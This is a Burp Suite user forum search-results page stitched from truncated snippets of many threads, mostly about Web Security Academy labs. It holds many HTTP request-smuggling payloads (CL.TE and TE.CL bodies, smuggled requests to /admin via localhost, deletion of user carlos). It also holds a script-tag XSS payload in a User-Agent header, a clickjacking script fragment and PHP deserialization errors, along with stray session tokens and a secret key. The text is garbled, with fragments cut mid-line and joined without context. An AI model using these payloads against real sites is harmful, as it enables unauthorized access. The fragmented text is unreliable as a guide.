Burp Suite User Forum
Found 250 posts in 99 threads
oc6ENALO7RzoOG4gf7nO3WuACjtMcBsv
Sec-WebSocket-Key: BFiL8g7xBMXsqpxcyoIZxg==
Content-Type: application/x-www-form-urlencoded … Content-Length: 13
tRANSFER-ENCODING: chunked
3
x=y
0
================================== … oc6ENALO7RzoOG4gf7nO3WuACjtMcBsv
Sec-WebSocket-Key: BFiL8g7xBMXsqpxcyoIZxg==
Content-Type: application/x-www-form-urlencoded … Content-Length: 19
tRANSFER-ENCODING: chunked
3
x=y
1
Z
Q
============================ … Content-Length: 13
tRANSFER-ENCODING: chunked
3
x=y
1
Z
Q
============================
id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y= … Signature does not match session in Command line code:7
Stack trace:
#0 {main}
thrown in /var/www
PHP Warning: require_once(User.php): failed to open stream: No such file or directory in /var/www … :/usr/share/php') in /var/www/index.php on line 1
And I am unable to log in, therefore no request … =1.1 id=Layer_1 xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' x=0px y= … is-warning>PHP Warning: require_once(User.php): failed to open stream: No such file or directory in /var/www … :/usr/share/php') in /var/www/index.php on line 1</p>
</div>
</section
--------------- S Y S T E M ---------------
OS:
Windows Server 2019 , 64 bit Build 17763 (10.0.17763.3287
Now run:
```
curl -i https://www.google.com/do/not/try -H 'Cookie: x=y=0&x=y&x=y&x=y&x=y&x=y&x=y& … x=y&x=y&x=false; foobar=eyJvcHRPdXQiOmZhbHNlLCJzZXNzaW9uSWQiOm51bGwsImxhc3RFdmVudFRpbWUiOm51bGwsImV2ZW50SWQiOjAsImlkZW50aWZ5SWQiOjAsInNlcXVlbmNlTnVtYmVyIjowfQ … additional requests
Now run the following (this only differs by one character, x=y10 instead of x=y= … 0):
```
curl -i https://www.google.com/do/not/try -H 'Cookie: x=y10&x=y&x=y&x=y&x=y&x=y&x=y&x=y&x=y
In both cases, the "x=y=0" request resulted in additional insertion points and more requests sent.
id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y= … Signature does not match session in Command line code:7
Stack trace:
#0 {main}
thrown in /var/www
kali:latest
ARG KALI_DESKTOP=xfce
RUN apt update && DEBIAN_FRONTEND='noninteractive' apt install -y … kali-desktop-xfce \
kali-tools-top10 \
&& DEBIAN_FRONTEND='noninteractive' apt-get purge -y … pm-utils xscreensaver*
ENV DISPLAY :1
ENV KALI_DESKTOP ${KALI_DESKTOP}
RUN apt-get install -y
Area
* IMessageEditor res: Response Text Area
* String text: Selected line to highlight
* Int x,y, … public Graphics highlight(Graphics g, IMessageEditor req, IMessageEditor res, String text, int x, int y, … ln.getAscent() + ln.getDescent());
int x1 = x + (width - textWidth)/2;
int y1 = (int)(y … gr.setColor(Color.YELLOW);
gr.setBackground(Color.YELLOW);
gr.fillRect(x, y,
For example, if the cluster bomb would give P1=X, P2=Y, P3=Z for one iteration, I would like to send: … param1 = X-Y-Z
param2 = X-Y-Z
Thank you for your help
following request, everything will work normally:
TRACE / HTTP/2
Host: foo.com
User-Agent: foobar
X: Y … ... then the TRACE request reflected back]
TRACE / HTTP/2
Host: foo.com
User-Agent: foobar
X: Y
Yes [y, Enter], No [n]
Choose whether to delete the data directory (/var/lib/BurpSuiteEnterpriseEdition … Yes [y], No [n, Enter]
Choose whether to delete the logs directory (/var/log/BurpSuiteEnterpriseEdition … Yes [y], No [n, Enter]
Choose whether to delete the database backups directory (/var/lib/BurpSuiteEnterpriseEdition … Yes [y], No [n, Enter]
```
To run the installer silently you can use the ```-q``` switch.
Origin: https://ac921f4f1ec67a2fc05d23890023008c.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … =1.1 id=Layer_1 xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' x=0px y=
I was able to copy
As follows
please treat me favorably
[y/N] Y
Do you want Burp Infiltrator to report the full parameter value when input reaches a potentially … [Y/n] [5.236s][info][class,load] java.util.IdentityHashMap$IdentityHashMapIterator source: jrt:/java.base … [Y/n]
Do you want to allow communication over unencrypted HTTP? … [y/N]
Do you want to restrict the Burp Collaborator servers that can be used? … [y/N]
Enter the file path to the target application bytecode.
responses" is given as
"POST /search HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded … Transfer-Encoding: chunked
7c
GET /404 HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded … server was given as
"GET /404 HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded … should be like this:
"GET /404 HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded … Content-Length: 146
x=POST /search HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
web server where certain categories of files (images, css) were having a filename of the format "_x-y" … with no extension, where x and y are alphanumeric values of a varying length of characters, e.g. _0a1b2c4d5e-f6g7h8i9j
return [left,top];
}function generateClickArea(pos) {
var elementWidth, elementHeight, x, y, … window.clickbandit.elementHeight = elementHeight;
x = window.clickbandit.config.clickTracking[pos].left;
y … btn.offsetWidth, h = btn.offsetHeight, container = document.getElementById('container'), x = btn.offsetLeft, y … = btn.offsetTop;
container.style.overflow = 'hidden';
container.style.clip = 'rect('+y+'px, ' … +(x+w)+'px, '+(y+h)+'px, '+x+'px)';
container.style.clipPath = 'inset('+y+'px '+(x+w)+'px '+(y+h)
There are x number of requests queued in Spider and y number of forms queued.
HTTP/1.1 Host: ac201f5c1e42e752809e2e6200c0001f.web-security-academy.net Content-Type: application/x-www-form-urlencoded … Content-Length: 272 Transfer-Encoding: chunked 0 POST /post/comment HTTP/1.1 Content-Type: application/x-www-form-urlencoded … HTTP/1.1
Host: ac201f5c1e42e752809e2e6200c0001f.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Content-Length: 272
Transfer-Encoding: chunked
0
POST /post/comment HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Symfony Version: 4.3.6
PHP Fatal error: Uncaught Exception: Signature does not match session in /var/www … /index.php:7 Stack trace: #0 {main} thrown in /var/www/index.php on line 7
Thanks
POST / HTTP/1.1
Host: my host.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Transfer-Encoding: chunked
Transfer-encoding: cow
5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
HTTP/1.1
Host: 0a9900df035bbae8c07d5a7d0077009b.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Content-Length: 4
Transfer-Encoding: chunked
5e
POST /404 HTTP/1.1
Content-Type: application/x-www-form-urlencoded … HTTP/1.1
Host: 0a9900df035bbae8c07d5a7d0077009b.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Content-Length: 105
Transfer-Encoding: chunked
5e
POST /404 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
I sent:
POST / HTTP/1.1
Host: your-lab-id.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Content-length: 4
Transfer-Encoding: chunked
5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded … Content-Length: 13
tRANSFER-ENCODING: chunked
3
x=y
1
Z
Q
And the response was:
HTTP/1.1
p9a5ei0x99qi74vejsq36czp0tn1z3d6, xlbjcoe8ecul6sfmtdrt5cm8qqr6o7hx]) Invalid access token for user carlos in /var/www … /index.php:7 Stack trace: #0 {main} thrown in /var/www/index.php on line 7
HTTP/1.1
Host: ac451f7f1e1dd31780a427f50095008e.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Transfer-Encoding: chunked
71
POST /admin HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
portwigger:
POST / HTTP/1.1
Host: your-lab-id.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Content-length: 4
Transfer-Encoding: chunked
5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
of wiener/peter, testing the application to see what was happening; after that I tried to log in and … username or invalid password", to which I said "logical, I deleted the account", but if I clear the history and
POST /dz588q90/xhr/api/v2/collector/beacon HTTP/1.1
Host: www.---------.com
Origin: http://example.com … : */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded … Content-Length: 1410
Origin: https://www.--------.com
Connection: close
Referer: https://www.realself.com
this:
sudo apt update && apt upgrade
sudo apt dist-upgrade
then type in terminal:
burpsuite
y
The URL is http://burp/ - there's no www.
receiving this error:
PHP Fatal error: Uncaught Exception: Signature does not match session in /var/www … /index.php:7 Stack trace: #0 {main} thrown in /var/www/index.php on line 7
My secret key: f99oqo0667s8noe1clqktoa99mnzvuq2
3 directory or 4 directory under root directory eg image(218.png) can we present in directory /var/www … /image/218.png or /var/www/image/abc/218.png, How we get to know this for applying Directory traversal
HTTP/1.1
Host: ac201fbc1fd627ddc0effe2300f200de.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … username=carlos HTTP/1.1
X-ayZFvQ-Ip: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length
error
Internal Server Error PHP Fatal error: Uncaught Exception: unserialize() failed in /var/www … /index.php:4 Stack trace: #0 {main} thrown in /var/www/index.php on line 4
Invalid access token for user administrator in Command line code:7 Stack trace: #0 {main} thrown in /var/www
access token for user administrator in Command line code:7
Stack trace:
#0 {main}
thrown in /var/www
Invalid access token for user administrator in Command line code:7 Stack trace: #0 {main} thrown in /var/www
74%39
Internal Server Error
PHP Fatal error: Uncaught Exception: unserialize() failed in /var/www … /index.php:4 Stack trace: #0 {main} thrown in /var/www/index.php on line 4
??
this error:
Internal Server Error PHP Fatal error: Uncaught Exception: unserialize() failed in /var/www … /index.php:4 Stack trace: #0 {main} thrown in /var/www/index.php on line 4
Then, what I did is:
Modifying serialized objects"
PHP Fatal error: Uncaught Exception: unserialize() failed in /var/www … /index.php:4
Stack trace:
#0 {main}
thrown in /var/www/index.php on line 4
echo "O:4:"User":2
provided is:
POST / HTTP/1.1
Host: your-lab-id.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Content-length: 4
Transfer-Encoding: chunked
5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
And the same thing happens to me as to Marc: something is wrong with this lab. … All the access log shows is internal access when accessing the email and the log
POST / HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Content-length: 4
Transfer-Encoding: chunked
5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
burp request ..Internal Server Error PHP Fatal error: Uncaught Exception: unserialize() failed in /var/www … /index.php:5 Stack trace: #0 {main} thrown in /var/www/index.php on line 5
HTTP/1.1
Host: ac821ff91fa6a6ac80911ed1005d00ec.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … 1.1
Host:
aca71f681fe0a61c80c01e0d01930066.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
HTTP/1.1
Host: acaf1f911ef7cfe6801f0c0400ef00b5.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Host: exploit-ace11f511e3acff980030cc4010500fe.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
HTTP/1.1
Host: ac7a1f911ef7995e80d3ec5300020083.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Host: exploit-acab1f4f1e8899f38092ec9101ef005c.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
HTTP/1.1
Host: acfb1ff41fc0eb70c03ba87e008c000d.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Host: exploit-ac6a1f321fcaeb3dc0f4a8cc013d002c.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Please see below:
POST / HTTP/1.1
Host: <lab-ID>.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Content-length: 4
Transfer-Encoding: chunked
5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
HTTP/1.1
Host: 0a4200c60375b196c058f06300d100b9.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Content-length: 4
Transfer-Encoding: chunked
5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
response when I sent this request
POST / HTTP/1.1
Host: my lab id
Content-Type: application/x-www-form-urlencoded … Transfer-Encoding: chunked
Transfer-encoding: cow
5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
HTTP/1.1
Host: 0a3a008503e2d7a7c03e1b91006c0030.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Content-Length: 256
Transfer-Encoding: chunked
0
POST /post/comment HTTP/1.1
Content-Type: application/x-www-form-urlencoded
HTTP/1.1
Host: 0abd00da04a3b710c0c4a56b002200b3.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Content-Length: 256
Transfer-Encoding: chunked
0
POST /post/comment HTTP/1.1
Content-Type: application/x-www-form-urlencoded
HTTP/1.1
Host: ac6d1fc91e74b3a4808926fc009c005a.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Content-length: 4
Transfer-Encoding: chunked
5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
the lab
POST / HTTP/1.1
Host: your-lab-id.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Content-Length: 256
Transfer-Encoding: chunked
0
POST /post/comment HTTP/1.1
Content-Type: application/x-www-form-urlencoded
HTTP/1.1
Host: ac4f1f451ed62abd80777fe600120062.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Content-Length: 277
Transfer-Encoding: chunked
0
POST /post/comment HTTP/1.1
Content-Type: application/x-www-form-urlencoded
However since the simulated user and the exploit server are probably on the same network the "www" part … Removing the "www" part did the trick. Thx for your concern.
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36
Content-Type: application/x-www-form-urlencoded … Transfer-Encoding: chunked
Connection: keep-alive
5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
However, on my machine - Appears to be quite similar, however some subtle differences -
com.host1.www
com.host1.www1
com.net2.www
even though the hostnames are actually displayed as expected
I'll paste the request:
POST / HTTP/1.1
Host: victimhost
Content-Type: application/x-www-form-urlencoded … postId=1 HTTP/1.1
Host: exploitserver
Content-Type: application/x-www-form-urlencoded
Content-Length
After this error, I log in to the account, download the license, and the same error appears again.
Here is what is shown in the Site map window right above (list of all URLs):
https://www. … id=WEB87431-20150616190 HTTP/1.1
Same with:
https://www._something_ com/ - GET - /bp_chart.php?
The install command is following:
$ sudo apt-get -y install fonts-ipafont
(Verified on Kali Linux 2023.4
Exploit:
```
POST / HTTP/1.1
Host: my-lab-id.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … postId=5 HTTP/1.1
User-Agent: a"/><script>alert(1)</script>
Content-Type: application/x-www-form-urlencoded
vulnerabilities:
POST /search HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded … Transfer-Encoding: chunked
7c
GET /404 HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
0a5900b7040dfb4fc1db8f1c005d0093.web-security-academy.net
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
HTTP/2
Host: 0a77006f03accff4c0f8bd7500440032.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … HTTP/2
Host: 0a77006f03accff4c0f8bd7500440032.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
HTTP/1.1
Host: 0ac800a704bbd7328148caab006b0005.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Transfer-Encoding: chunked
Transfer-encoding: cow
5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
to the 'Level progress' section of the Dashboard, which will record your progress in terms of 'X of Y'
acc91f4d1faf6485c0b70322000b009b.web-security-academy.net
Cookie: session=bWpx0z3BW0qJhvBVGo9kof3BBkwpv3qU
Content-Type: application/x-www-form-urlencoded … Transfer-encoding: chunked
0
POST /post/comment HTTP/1.1
Content-Length: 600
Content-Type: application/x-www-form-urlencoded
Hi,
I would like to know if there would be problems with the license of burp suite PRO y I have one
reads as below:
POST /search HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded … Transfer-Encoding: chunked
7c
GET /404 HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
binary, also the update-alternatives command; in the terminal it returns the serialized object correctly and
Transfer-Encoding: chunked
0
POST /login HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded … supposed to be:
0
POST /login HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Technical_notes/Add_a_second_IP_address_to_an_existing_network_adapter_on_Windows and "Linux":https://www
HTTP/1.1
Host: aca11fb21f25e1e3803a19b400f90012.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Content-length: 4
Transfer-Encoding: chunked
60
POST /admin HTTP/1.1
Content-Type: application/x-www-form-urlencoded … POST /admin HTTP/1.1 -> 20 characters + 2 ending \r\n (22 characters)
Content-Type: application/x-www-form-urlencoded
x=y"
/my_profile;jsessionid=560423289919l0e2g6f88f71qjg4xp1z2uwc408389.5604232899 HTTP/1.1
Host: www..... … Connection: close
Content-Length: 3002
X-Single-Page-Navigation: true
Origin: https://www.....
https://www.?elp.com
After this error, I log in to the account, download the license, and the same error appears again.
like Gecko) Chrome/88.0.4324.150 Safari/537.36
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded … keep-alive
96
GET /404 HTTP/1.1
X: x=1&q=smugging&x=
Host: example.com
Content-Type: application/x-www-form-urlencoded
already did all the adjusts and I tried to submit the solution in different browsers (Firefox, Edge y
hello, I would like to carry out an authenticated scan on the domain Y but to access this domain I must
%Y %H:%i:%s') as FULL_DATE_CHANGE
,DATE_FORMAT(sc.DATE_CHANGE, '%d.%m. … %Y') as DATE_CHANGE
,sc.USER_ID
,scsite.URL as SITE_URL
,scsite.SITE_ID
,stt.RANK as `RANK`
HTTP/1.1
Host: ac4f1f861e1580afc0ad62b3000a0048.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Transfer-Encoding: chunked
Content-Length: 251
0
POST /post/comment HTTP/1.1
Content-Type: application/x-www-form-urlencoded
this -
Internal Server Error
PHP Fatal error: Uncaught Exception: unserialize() failed in /var/www … /index.php:4 Stack trace: #0 {main} thrown in /var/www/index.php on line 4.
: 33
Sec-Ch-Ua: "Chromium";v="121", "Not A(Brand";v="99"
Accept: */*
Content-Type: application/x-www-form-urlencoded … : 33
Sec-Ch-Ua: "Chromium";v="121", "Not A(Brand";v="99"
Accept: */*
Content-Type: application/x-www-form-urlencoded
As such, it is recommended to set the header as X-XSS-Protection: 0"
Reference https://owasp.org/www-project-secure-headers
for example :
POST /search HTTP/1.1
Host: normal-website.com
Content-Type: application/x-www-form-urlencoded
The Content-Type is: application/x-www-form-urlencoded
2021-12-16 17:54:42 [r] INFO - Detail: {"method":"Fetch.req - 0063\u0007Un^f\u00164\\C\uda62 >>> Y … <<< >z,a&S}\u0
2021-12-16 17:54:42 [r] INFO - net.portswigger.fe: Expected '\' but got 'Y' at [line
(y/n)".
Kindly help.
.*\.example\.com\/*
test\.net\/path\/here\/*
www\.test\.net\/*
-----------
with left click, right click send to repeater, POST request this time, redacted below:
POST /w/x/1/y-z
7f2f9e055a74df967116223c431c9ffc=qub7j1cc8bi084gvtd3p2b1q84
Connection: close
Content-Type: application/x-www-form-urlencoded
HTTP/1.1
Host: 0a90006303d9bbc387c5700800820036.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Put the following into a .txt file:
y
LICENSE-KEY-PASTED-HERE
o
4.
0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded … 0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
https://acc21fb41ee34de080e60e9f005f0050.web-security-academy.net/email
Content-Type: application/x-www-form-urlencoded … https://acc21fb41ee34de080e60e9f005f0050.web-security-academy.net/email
Content-Type: application/x-www-form-urlencoded … https://acc21fb41ee34de080e60e9f005f0050.web-security-academy.net/email
Content-Type: application/x-www-form-urlencoded
Hi,
It looks like you are trying to achieve what is described in the articles below:
- https://www
HTTP/1.1
Host: 0a120052048d10f0c0b07c7700c300bb.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
solution :
POST / HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
username=carlos HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length
HTTP/2
Host: 0a6f004904bb0b7282f5067100c70057.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
X-CSRFToken: I7qjj8Iz3XwEEwu2gL4ZcePHMdNjOUD6
Content-Type: application/x-www-form-urlencoded … Connection: close
X-Forwarded-For: 127.0.0.1
Notice the change to "Content-Type: application/x-www-form-urlencoded
0ac000af04eed935c3233d650017001f.web-security-academy.net
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded